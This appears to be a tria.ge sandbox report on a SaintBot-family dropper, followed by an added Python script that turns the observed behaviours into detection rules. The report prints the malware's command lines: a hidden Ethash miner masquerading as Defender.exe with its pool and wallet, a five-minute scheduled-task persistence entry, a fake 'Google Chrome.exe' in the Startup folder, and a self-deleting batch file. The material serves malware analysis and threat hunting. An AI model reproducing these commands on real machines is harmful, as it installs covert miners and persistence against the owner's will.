Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20241010-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    22/12/2024, 02:50

General

  • Target

    9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe

  • Size

    4.0MB

  • MD5

    539273d402029467299ebfd32f365b53

  • SHA1

    7b208fa71b1dbfa17378eabde614c0ed6c8e2fc3

  • SHA256

    9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90

  • SHA512

    d539c2e40a7635a54999fc885b26bc7730da391a2f0991dddf8c63a75600298eaf068363f67bcfb3df0a10c37a5f8fbf077c4bdcd90af68dcc7e3d7e1c30443a

  • SSDEEP

    98304:qhxc++JLGaI8ojO9uHZRQ4Kg/rp0WwJYxLa4iv:03G6Ooi9u+gjy+x2jv

Malware Config

Signatures

  • SaintBot

    Saint Bot is a malware dropper used to deliver secondary payloads such as information stealers.

  • SaintBot payload 1 IoCs
  • Saintbot family
  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe
    "C:\Users\Admin\AppData\Local\Temp\9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Admin\run.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c 5666.bat
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Users\Admin\AppData\Local\Admin\Defender.exe
          Defender.exe
          4⤵
          • Executes dropped EXE
          PID:2712
        • C:\Users\Admin\AppData\Local\Admin\Defender.exe
          Defender.exe --algo ETHASH --pool eth.2miners.com:2020 --user 0xbFA6b56Ff31539269929C6913B7e68A45122847c.Worker
          4⤵
          • Executes dropped EXE
          PID:980
    • C:\Users\Admin\AppData\Local\Admin\watchdog.exe
      "C:\Users\Admin\AppData\Local\Admin\watchdog.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Loads dropped DLL
      • Maps connected drives based on registry
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • Maps connected drives based on registry
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Windows\SysWOW64\dfrgui.exe
          "C:\Windows\system32\dfrgui.exe"
          4⤵
          • Loads dropped DLL
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:1940
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 5 /tn "Update" /tr "%SYSTEMDRIVE%\Users\%USERNAME%\AppData\Local\zz%USERNAME%\%USERNAME%.vbs" /F
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2088
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Users\Admin\AppData\Roaming\del.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\SysWOW64\PING.EXE
          ping localhost -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1788
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c del "C:\Users\Admin\AppData\Roaming\del.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2184
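The process tree above records the whole chain: the sample starts WScript on run.vbs, which runs 5666.bat, which launches Defender.exe as an Ethash miner pointed at eth.2miners.com:2020; in parallel watchdog.exe starts a copy named "Google Chrome.exe" from the Startup folder, that process starts dfrgui.exe (a Windows defragmentation UI that has no business spawning children), dfrgui.exe registers a five-minute scheduled task for a .vbs under AppData, and a del.bat removes itself after a ping delay. The script below is an added example, not part of this report or of tria.ge's own tooling: it encodes those behaviours as detection rules and runs them over the process records transcribed from the tree (PIDs, images and command lines as shown above; parent links follow the nesting). The rule names, the 15-minute threshold for "short interval", the list of binaries that legitimately spawn schtasks, and the "injected host" heuristic are this example's own assumptions, not anything the report states.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 = no parent recorded
    image: str
    cmdline: str

# Constructed from the report's Processes section; ppid follows the tree nesting shown there.
SAMPLE = "9361a5a13c26bdba1ce006356706339272465f4fa25c75a008f0041b9b647b90.exe"
TEMP = r"C:\Users\Admin\AppData\Local\Temp" + "\\" + SAMPLE
ADMIN = r"C:\Users\Admin\AppData\Local\Admin"
STARTUP = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
PROCS = [
    Proc(3016, 0, TEMP, f'"{TEMP}"'),
    Proc(2972, 3016, r"C:\Windows\SysWOW64\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Admin\run.vbs"'),
    Proc(2168, 2972, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c 5666.bat'),
    Proc(2712, 2168, ADMIN + r"\Defender.exe", "Defender.exe"),
    Proc(980, 2168, ADMIN + r"\Defender.exe", "Defender.exe --algo ETHASH --pool eth.2miners.com:2020 "
         "--user 0xbFA6b56Ff31539269929C6913B7e68A45122847c.Worker"),
    Proc(3000, 3016, ADMIN + r"\watchdog.exe", f'"{ADMIN}\\watchdog.exe"'),
    Proc(2904, 3000, STARTUP + r"\Google Chrome.exe", f'"{STARTUP}\\Google Chrome.exe"'),
    Proc(1940, 2904, r"C:\Windows\SysWOW64\dfrgui.exe", r'"C:\Windows\system32\dfrgui.exe"'),
    Proc(2088, 1940, r"C:\Windows\SysWOW64\schtasks.exe",
         r'"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 5 /tn "Update" '
         r'/tr "%SYSTEMDRIVE%\Users\%USERNAME%\AppData\Local\zz%USERNAME%\%USERNAME%.vbs" /F'),
    Proc(2764, 3000, r"C:\Windows\SysWOW64\cmd.exe", r"cmd /c C:\Users\Admin\AppData\Roaming\del.bat"),
    Proc(1788, 2764, r"C:\Windows\SysWOW64\PING.EXE", "ping localhost -n 3"),
    Proc(2184, 2764, r"C:\Windows\SysWOW64\cmd.exe", r'cmd /c del "C:\Users\Admin\AppData\Roaming\del.bat"'),
]

def _base(image): return image.rsplit("\\", 1)[-1].lower()

def _ancestors(p, table):
    while p.ppid in table:          # the tree is acyclic, so this terminates
        p = table[p.ppid]
        yield p

def lineage(pid, procs):
    table = {p.pid: p for p in procs}   # image basenames from the root of the tree down to pid
    return [_base(a.image) for a in _ancestors(table[pid], table)][::-1] + [_base(table[pid].image)]

# Each rule takes (process, pid table) and returns a detail string when it fires, else None.
_POOL = re.compile(r"--pool[=\s]+(\S+:\d+)", re.I)
_MINER_FLAGS = re.compile(r"--(?:algo|user|wallet|coin)\b", re.I)
def rule_miner_cmdline(p, table):
    m = _POOL.search(p.cmdline)
    return f"mining pool {m.group(1)} on the command line" if m and _MINER_FLAGS.search(p.cmdline) else None

_SC_MINUTE = re.compile(r"/sc\s+minute\b.*?/mo\s+(\d+)", re.I)
_TR = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)
def rule_schtasks_short_interval(p, table):
    if _base(p.image) != "schtasks.exe" or "/create" not in p.cmdline.lower():
        return None
    mo, tr = _SC_MINUTE.search(p.cmdline), _TR.search(p.cmdline)
    target = (tr.group(1) or tr.group(2)) if tr else ""
    if mo and int(mo.group(1)) <= 15 and (target.lower().endswith((".vbs", ".js", ".bat", ".cmd", ".ps1")) or "\\appdata\\" in target.lower()):
        return f"task every {mo.group(1)} min running {target}"
    return None

def rule_exe_in_startup_folder(p, table):
    im = p.image.lower()
    return f"runs from the Startup folder as {_base(im)}" if "\\start menu\\programs\\startup\\" in im and im.endswith(".exe") else None

_DEL = re.compile(r'\bdel\b\s+(?:/\S+\s+)*"?([^"\s]+\.(?:bat|cmd))"?', re.I)
def rule_batch_self_delete(p, table):
    m = _DEL.search(p.cmdline) if _base(p.image) == "cmd.exe" else None
    for anc in (_ancestors(p, table) if m else ()):   # fires only if the deleted .bat is one this chain ran
        if m.group(1).lower() in anc.cmdline.lower():
            return f"deletes {m.group(1)} that pid {anc.pid} executed"
    return None

_SHELLS = {"cmd.exe", "powershell.exe", "explorer.exe", "svchost.exe", "msiexec.exe", "wscript.exe", "cscript.exe"}
def rule_schtasks_from_injected_host(p, table):
    # Heuristic: a Windows binary that normally spawns nothing launches schtasks while its own parent
    # lives in a user profile; consistent with code injected into that system binary.
    parent = table.get(p.ppid) if _base(p.image) == "schtasks.exe" else None
    if not parent or _base(parent.image) in _SHELLS or not parent.image.lower().startswith("c:\\windows\\"):
        return None
    grand = table.get(parent.ppid)
    if grand and grand.image.lower().startswith("c:\\users\\"):
        return f"{_base(parent.image)} (child of {_base(grand.image)}) spawned schtasks"
    return None

RULES = {"miner_cmdline": rule_miner_cmdline, "schtasks_short_interval": rule_schtasks_short_interval,
         "exe_in_startup_folder": rule_exe_in_startup_folder, "batch_self_delete": rule_batch_self_delete,
         "schtasks_from_injected_host": rule_schtasks_from_injected_host}

def scan(procs):
    """Run every rule over every process; returns (pid, rule, detail) triples in tree order."""
    table = {p.pid: p for p in procs}
    return [(p.pid, name, d) for p in procs for name, fn in RULES.items() if (d := fn(p, table))]

if __name__ == "__main__":
    for pid, name, detail in scan(PROCS):
        print(f"[{name}] pid {pid}: {detail}\n    " + " > ".join(lineage(pid, PROCS)))
```

Run as-is it reports five hits: the miner command line on PID 980, the Startup-folder copy on PID 2904, both schtasks rules on PID 2088 (the short-interval task and the fact that dfrgui.exe, itself a child of the Startup-folder executable, is what created it), and the self-deleting del.bat on PID 2184, each with the ancestry back to the sample. The self-delete rule deliberately checks that the deleted batch file is one an ancestor actually ran, so an ordinary "del cleanup.bat" in a script does not trigger it; the same record layout is what you would get from Sysmon event 1 or EDR process-creation telemetry, so the rules carry over to live hunting with the sandbox-specific paths replaced.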

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Admin\5666.bat

    Filesize

    490B

    MD5

    3d959857b0136a49f004516acc96a627

    SHA1

    60f7ec89669792026aeec876f664d62d19bdc269

    SHA256

    e3cf05b34d24ca28a56a04281d310b4212adc2a19aae43f668bff34debd60f04

    SHA512

    e3d11abd4bfe1f0fa635241c120d2c09966926673792e440a1721a3a88e08e48cfb4079c0f6037f1f275edf4d0dbd8d37266e0047674d882207b06e1dbaa805a

  • C:\Users\Admin\AppData\Local\Admin\run.vbs

    Filesize

    116B

    MD5

    1b068a0de7c2182577b08ccf6973d35d

    SHA1

    fcae2d3432c11c9139e1a5ac513667f1f00931ca

    SHA256

    3ab89fde92e31ee6818660f9c29acc2cf0d03799bb5c4f0641929bbd8eade2b4

    SHA512

    728b6b024e1f5b9df94de37d83b9423447888783e0bcd7528047ee1d922784deb30df9a232f87f0e95e4d47499544c7bd2368a2f35b144bfd385a203464d71f3

  • C:\Users\Admin\AppData\Local\Admin\watchdog.exe

    Filesize

    29KB

    MD5

    512292a064c1899e46b19b2f0c3ada9a

    SHA1

    fabb10754aceead1c7c0688b10484971ac020149

    SHA256

    c773acbb7e825f660f9e7c4c6c71b20e678b556e63e702a3f3286bd59c3f1b61

    SHA512

    16788ca1c710726ad98317b9e9c7da82bbbfe4d511a611f558418784d39fd789925691ea3caca79cb5ea38c81f2d1b3dd2003eb246063fa5cb5ac81e834f0f35

  • C:\Users\Admin\AppData\Local\zzAdmin\slideshow.mp4

    Filesize

    1.2MB

    MD5

    d124f55b9393c976963407dff51ffa79

    SHA1

    2c7bbedd79791bfb866898c85b504186db610b5d

    SHA256

    ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef

    SHA512

    278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

  • C:\Users\Admin\AppData\Roaming\del.bat

    Filesize

    114B

    MD5

    ccf1f01af7806334814c7d2481b60e59

    SHA1

    126b1d3d067653d3936f82b15b060bce172c0258

    SHA256

    432e3e54e9c6f791ae439eb3af32bc350ffbae4ea42724a1875c13e49058e940

    SHA512

    d333c52d23ba1473117f5e83c13fc880055989df4fc3a9cb69b13d3e297160f048e9a9256289840d9039587dd08030798027204f66886e6ae83136512fff81b0

  • \Users\Admin\AppData\Local\Admin\Defender.exe

    Filesize

    3.7MB

    MD5

    3c9dcc91e05dc05a01fff739e40474d7

    SHA1

    4958788d0d3f4bdd7410669da6b8d66c642b0551

    SHA256

    6dd7b3d944595429136366b908fd18d3cac315c6f1453dd4cb5bcafa9e9a95a6

    SHA512

    f6fbe0bf4c71e6bda658d42b0bae94b51da6bf44ec813c070b7a74c7243f277ca0749b37dcd48a71e42295f7ade9f2384e6a69711cbb2dcbd732c0a4c7934d0f

  • memory/980-56-0x000000013F530000-0x0000000141350000-memory.dmp

    Filesize

    30.1MB

  • memory/1940-55-0x0000000000080000-0x000000000008B000-memory.dmp

    Filesize

    44KB

  • memory/2168-49-0x0000000002040000-0x0000000003E60000-memory.dmp

    Filesize

    30.1MB

  • memory/2168-57-0x0000000002040000-0x0000000003E60000-memory.dmp

    Filesize

    30.1MB

  • memory/2712-50-0x000000013FCC0000-0x0000000141AE0000-memory.dmp

    Filesize

    30.1MB